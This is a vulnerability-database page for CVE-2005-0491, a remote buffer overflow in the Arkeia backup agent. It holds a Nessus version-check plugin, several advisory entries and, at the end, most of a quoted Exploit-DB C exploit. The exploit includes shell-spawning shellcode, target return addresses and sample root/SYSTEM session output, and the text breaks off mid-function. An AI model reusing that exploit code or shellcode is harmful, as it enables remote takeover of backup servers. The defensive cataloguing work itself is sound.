ID ARKEIA_TYPE77_OVERFLOW.NASL Type nessus Reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. Modified 2021-04-02T00:00:00
Description
The remote host is running Arkeia Network Backup agent, used for
backups of the remote host.
The remote version of this agent contains a buffer overflow
vulnerability that may allow an attacker to execute arbitrary commands
on the remote host with the privileges of the Arkeia daemon, usually
root.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if(description)
{
script_id(17158);
script_version("1.18");
script_cve_id("CVE-2005-0491");
script_bugtraq_id(12594);
script_name(english:"Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow");
script_set_attribute(attribute:"synopsis", value:
"The remote backup service is prone to a buffer overflow attack." );
script_set_attribute(attribute:"description", value:
"The remote host is running Arkeia Network Backup agent, used for
backups of the remote host.
The remote version of this agent contains a buffer overflow
vulnerability that may allow an attacker to execute arbitrary commands
on the remote host with the privileges of the Arkeia daemon, usually
root." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Feb/413" );
script_set_attribute(attribute:"solution", value:
"Upgrade to Arkeia 5.3.5, 5.2.28 our 5.1.21." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Arkeia Backup Client Type 77 Overflow (Win32)');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/21");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/18");
script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Checks the version number of the remote arkeia daemon");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_family(english:"Gain a shell remotely");
script_require_ports(617);
script_dependencie("arkeia_default_account.nasl");
exit(0);
}
version = get_kb_item("arkeia-client/617");
if ( ! version ) exit(0);
if ( ereg(pattern:"^([0-4]\.|5\.0|5\.1\.([0-9](1?[^0-9]|$)|20)|5\.2\.(1?[0-9]([^0-9]|$)|2[0-7])|5\.3\.[0-4]([^0-9]|$))", string:version))
security_hole(617);
{"id": "ARKEIA_TYPE77_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow", "description": "The remote host is running Arkeia Network Backup agent, used for\nbackups of the remote host. \n\nThe remote version of this agent contains a buffer overflow\nvulnerability that may allow an attacker to execute arbitrary commands\non the remote host with the privileges of the Arkeia daemon, usually\nroot.", "published": "2005-02-21T00:00:00", "modified": "2021-04-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/17158", "reporter": "This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.", "references": ["https://seclists.org/bugtraq/2005/Feb/413"], "cvelist": ["CVE-2005-0491"], "type": "nessus", "lastseen": "2021-04-01T01:26:31", "edition": 28, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0491"]}, {"type": "saint", "idList": ["SAINT:3F5FC78DEFC236059E73F73EEAD57DB0", "SAINT:CC45EED5186609E101B411313F334ECA", "SAINT:504F3CE3B3863242033791F8E90C1EEC"]}, {"type": "osvdb", "idList": ["OSVDB:14011"]}, {"type": "exploitdb", "idList": ["EDB-ID:828", "EDB-ID:9930", "EDB-ID:16466", "EDB-ID:16865", "EDB-ID:102"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/ARKEIA/TYPE77", "MSF:EXPLOIT/OSX/ARKEIA/TYPE77"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82305"]}], "modified": "2021-04-01T01:26:31", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2021-04-01T01:26:31", "rev": 2}, "vulnersScore": 9.0}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(17158);\n script_version(\"1.18\");\n script_cve_id(\"CVE-2005-0491\");\n script_bugtraq_id(12594);\n\n script_name(english:\"Knox Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote backup service is prone to a buffer overflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Arkeia Network Backup agent, used for\nbackups of the remote host. \n\nThe remote version of this agent contains a buffer overflow\nvulnerability that may allow an attacker to execute arbitrary commands\non the remote host with the privileges of the Arkeia daemon, usually\nroot.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Feb/413\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Arkeia 5.3.5, 5.2.28 our 5.1.21.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Arkeia Backup Client Type 77 Overflow (Win32)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/02/18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks the version number of the remote arkeia daemon\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n script_require_ports(617);\n script_dependencie(\"arkeia_default_account.nasl\");\n exit(0);\n}\n\n\nversion = get_kb_item(\"arkeia-client/617\");\nif ( ! version ) exit(0);\nif ( ereg(pattern:\"^([0-4]\\.|5\\.0|5\\.1\\.([0-9](1?[^0-9]|$)|20)|5\\.2\\.(1?[0-9]([^0-9]|$)|2[0-7])|5\\.3\\.[0-4]([^0-9]|$))\", string:version))\n\tsecurity_hole(617);\n", "naslFamily": "Gain a shell remotely", "pluginID": "17158", "cpe": [], "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "Stack-based buffer overflow in Knox Arkeia Server Backup 5.3.x allows remote attackers to execute arbitrary code via a long type 77 request.", "edition": 4, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0491", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0491"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc2", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc4", "cpe:/a:knox_software:arkeia_server_backup:5.3.0", "cpe:/a:knox_software:arkeia_server_backup:5.3.3", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc1", "cpe:/a:knox_software:arkeia_server_backup:5.3.0_rc3", "cpe:/a:knox_software:arkeia_server_backup:5.3.2", "cpe:/a:knox_software:arkeia_server_backup:5.3.4", "cpe:/a:knox_software:arkeia_server_backup:5.3.1"], "id": "CVE-2005-0491", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0491", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc1:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc3:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:knox_software:arkeia_server_backup:5.3.0_rc4:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "edition": 1, "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "id": "SAINT:3F5FC78DEFC236059E73F73EEAD57DB0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "type": "saint", "title": "Arkeia Type 77 Request buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:47", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "edition": 2, "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "id": "SAINT:504F3CE3B3863242033791F8E90C1EEC", "title": "Arkeia Type 77 Request buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "description": "Added: 01/24/2006 \nCVE: [CVE-2005-0491](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0491>) \nBID: [12594](<http://www.securityfocus.com/bid/12594>) \nOSVDB: [14011](<http://www.osvdb.org/14011>) \n\n\n### Background\n\nThe [Arkeia](<http://www.arkeia.com/>) network backup software includes a daemon program called `**arkeiad**` which listens for connections on TCP port 617. \n\n### Problem\n\nA buffer overflow in the processing of type 77 requests sent to the `**arkeiad**` listener allows remote attackers to execute commands. \n\n### Resolution\n\n[Upgrade](<http://www.arkeia.com/download/index.php>) to Arkeia stable version 5.3.5 or higher. \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html> \n\n\n### Limitations\n\nExploit works on Arkeia Network Backup Client 5.2.27. \n\n### Platforms\n\nWindows \nLinux \n \n\n", "edition": 4, "modified": "2006-01-24T00:00:00", "published": "2006-01-24T00:00:00", "id": "SAINT:CC45EED5186609E101B411313F334ECA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/arkeia_type_77_request", "title": "Arkeia Type 77 Request buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2005-0491"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Arkeia Backup Client. The application fails to perform proper bounds checking when processing packets marked as 'type 77' resulting in a buffer overflow. With a specially crafted type 77 request to port 617 (tcp), a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 5.1.21, 5.2.28, 5.3.5 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Restrict access to the service.\n## Short Description\nA remote overflow exists in Arkeia Backup Client. The application fails to perform proper bounds checking when processing packets marked as 'type 77' resulting in a buffer overflow. With a specially crafted type 77 request to port 617 (tcp), a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://www.arkeia.com/\nSecurity Tracker: 1013256\n[Secunia Advisory ID:14327](https://secuniaresearch.flexerasoftware.com/advisories/14327/)\nOther Advisory URL: http://metasploit.com/research/arkeia_agent/\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0397.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0433.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0487.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0420.html\nISS X-Force ID: 19398\n[CVE-2005-0491](https://vulners.com/cve/CVE-2005-0491)\n", "modified": "2005-02-18T10:13:30", "published": "2005-02-18T10:13:30", "href": "https://vulners.com/osvdb/OSVDB:14011", "id": "OSVDB:14011", "type": "osvdb", "title": "Arkeia Backup Client Type 77 Request Processing Buffer Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T12:57:44", "description": "Knox Arkeia Server Backup 5.3.x Remote Root Exploit. CVE-2005-0491. Remote exploits for multiple platform", "published": "2005-02-18T00:00:00", "type": "exploitdb", "title": "Knox Arkeia Server Backup 5.3.x - Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2005-02-18T00:00:00", "id": "EDB-ID:828", "href": "https://www.exploit-db.com/exploits/828/", "sourceData": "/*\r\n * Knox Arkiea Server Backup\r\n * arkiead local/remote root exploit\r\n * Targets for Redhat 7.2/8.0, Win2k SP2/SP3/SP4, WinXP SP1, Win 2003 EE \r\n * Works up to current version 5.3.x \r\n *\r\n * ---------------\r\n *\r\n * Linux x86:\r\n * ./arksink2 <arkeia_host> <target_type> <display>\r\n *\r\n * Exports an xterm to the box of your choosing. Make sure to \"xhost +\" on\r\n * the box you're exporting to.\r\n * \r\n * A stack overflow is in the processing of a type 77 request. EIP is actually\r\n * overwritten at 64 bytes, but the trailing NULL scrambled a pointer so we\r\n * have to write past EIP and insert a \"safe\" value. Put this value behind your\r\n * NOP+sc return address so it doesn't mess with the sled.\r\n *\r\n * Since the buffer is so small, we initially send an invalid packet that ends\r\n * up on the heap a second before the overflow happens. If it is a high traffic\r\n * Arkeia server the heap might be a bit volatile, so play around with putting\r\n * nops+sc after the overwritten pointer. The heap method avoids non-exec stack\r\n * protection, however.\r\n *\r\n * Includes targets for RH8 and RH7.2\r\n * \r\n * [user@host user]$ ./prog 192.168.1.2 1 192.168.1.1:0\r\n * [*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\r\n * [*] Attacking LINUX system\r\n * [*] Exporting xterm to 192.168.1.1:0 \r\n * [*] Connected to 192.168.1.2:617 NOP+shellcode socket\r\n * [*] Connected to 192.168.1.2:617 overflow socket\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Done, check for xterm\r\n *\r\n *\r\n * ---------------\r\n * \r\n * Windows x86:\r\n * ./prog <host> <target> <offset>\r\n *\r\n * Spawns a shell on port 80 of the remote host\r\n *\r\n * EIP is overwritten beginning with the 25th byte after the header. Since Windows\r\n * is little endian and has the heap mapped to 0x00XXXXXX we can avoid having to\r\n * write an extra null past EIP. Another advantage here is that we can put all our\r\n * nops and shellcode in the same packet, but after the NULL. They will not be copied\r\n * onto the stack (and therefore not munge the pointer after it) but will remain\r\n * in memory as a raw packet. Fire up ollydbg, search for your nops and voila.\r\n *\r\n * [user@host user]$ ./arksink2 192.168.1.2 3 0\r\n * [*] Knox Arkeia <= v5.3.x remote SYSTEM exploit\r\n * [*] Attacking Windows system\r\n * [*] Spawning shell on 192.168.1.2:80\r\n * [*] Connected to 192.168.1.2:617 overflow socket\r\n * [*] Sending overflow\r\n * [*] Attempting to get remote shell, try #0\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #1\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #2\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #3\r\n * [!] connect: Resolver Error 0 (no error)\r\n * [*] Attempting to get remote shell, try #4\r\n * [*] Success, enjoy\r\n * Microsoft Windows 2000 [Version 5.00.2195]\r\n * (C) Copyright 1985-2000 Microsoft Corp.\r\n *\r\n * C:\\WINNT\\system32>whoami\r\n * whoami\r\n * SYSTEM\r\n *\r\n * C:\\WINNT\\system32>\r\n * \r\n *\r\n * ---------------\r\n * \r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n#define BUFLEN\t\t10000\t\t/* for readshell()\t\t*/\r\n#define DATA_LEN\t1000\t\t/* overflow packet data section\t*/\r\n#define HEAD_LEN \t8\t\t/* overflow packet header\t*/\r\n#define NOP_LEN\t\t20000\t\t/* nop+shellcode packet \t*/\r\n#define\tARK_PORT\t617\t\t/* port Arkeiad listens on\t*/\r\n#define SHELL_PORT\t80\t\t/* for the windows shellcode\t*/\r\n#define NOP \t\t0x90\t\t/* Intel x86\t\t\t*/\r\n#define NUMTARGS\t5\t\t/* increase when adding targets */\r\n#define LINUX\t\t1\t\t/* Linux target type\t\t*/\r\n#define WINDOWS\t\t2\t\t/* Windows target type\t\t*/\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n\tunsigned int\tlen;\r\n\tint\t\ttargtype;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080e0144, 68, LINUX },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940, 68, LINUX },\r\n\t{ \"Windows 2k SP2, SP3, SP4\", 0x007d2144, 0xdeadbeef, 28, WINDOWS },\r\n\t{ \"Windows 2003 EE\", 0x007b2178, 0xdeadbeef, 28, WINDOWS },\r\n\t{ \"Windows XP SP1\", 0x007d20e7, 0xdeadbeef, 28, WINDOWS },\r\n\tNULL\r\n};\r\n\r\n\r\n// Linux shellcode exports xterm\r\nconst char shellcode[] =\r\n\"\\xeb\\x4f\\x5e\\x31\\xd2\\x88\\x56\\x14\\x88\\x56\\x18\\x88\\x56\\x21\\xb2\\x2b\"\r\n\"\\x31\\xc9\\xb1\\x09\\x80\\x3c\\x32\\x4b\\x74\\x05\\x42\\xe2\\xf7\\xeb\\x2b\\x88\"\r\n\"\\x34\\x32\\x31\\xd2\\x89\\xf3\\x89\\x76\\x36\\x8d\\x7e\\x15\\x89\\x7e\\x3a\\x8d\"\r\n\"\\x7e\\x19\\x89\\x7e\\x3e\\x8d\\x7e\\x22\\x89\\x7e\\x42\\x89\\x56\\x46\\x8d\\x4e\"\r\n\"\\x36\\x8d\\x56\\x46\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n\"\\x80\\xe8\\xac\\xff\\xff\\xff\"\r\n\"/usr/X11R6/bin/xterm8-ut8-display8\";\r\n\r\n// Windows shellcode binds shell to port 80\r\nconst char shellcode_win[] =\r\n \"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\"\r\n \"\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\"\r\n \"\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\"\r\n \"\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\"\r\n \"\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\"\r\n \"\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\"\r\n \"\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\"\r\n \"\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\"\r\n \"\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\"\r\n \"\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\\x80\\xbf\\x62\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\"\r\n \"\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\"\r\n \"\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\"\r\n \"\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\"\r\n \"\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\"\r\n \"\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\"\r\n \"\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\"\r\n \"\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\"\r\n \"\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\"\r\n \"\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\"\r\n \"\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\"\r\n \"\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\"\r\n \"\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\"\r\n \"\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\"\r\n \"\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\"\r\n \"\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\\x80\\x2b\\xa2\\x04\";\r\n\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\treturn(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] connect\");\r\n\t\treturn(-1);\r\n\t}\r\n\t\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n%s hostname target_num display (attacking Linux)\\n\", progname);\r\n\tfprintf(stderr, \"%s hostname target_num offset (attacking Windows)\\n\", progname);\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\tfprintf(stderr, \"Example: %s 192.168.1.2 1 192.168.1.1:0\\n\", progname);\r\n\texit(-1);\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint lin(char *host, char *export, unsigned int tnum)\r\n{\r\n\r\n\tchar \t\thead[] \t\t= \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[DATA_LEN];\r\n\tchar\t\tsc_req[NOP_LEN*2];\r\n\tchar\t\t*sc;\r\n\tunsigned int\tretaddr;\r\n\tunsigned int\tsafe;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tint\t\tsock_overflow, sock_nops;\r\n\tint \t\ti;\r\n\tint\t\tnullmap = 0;\r\n\r\n\tsock_overflow = sock_nops = 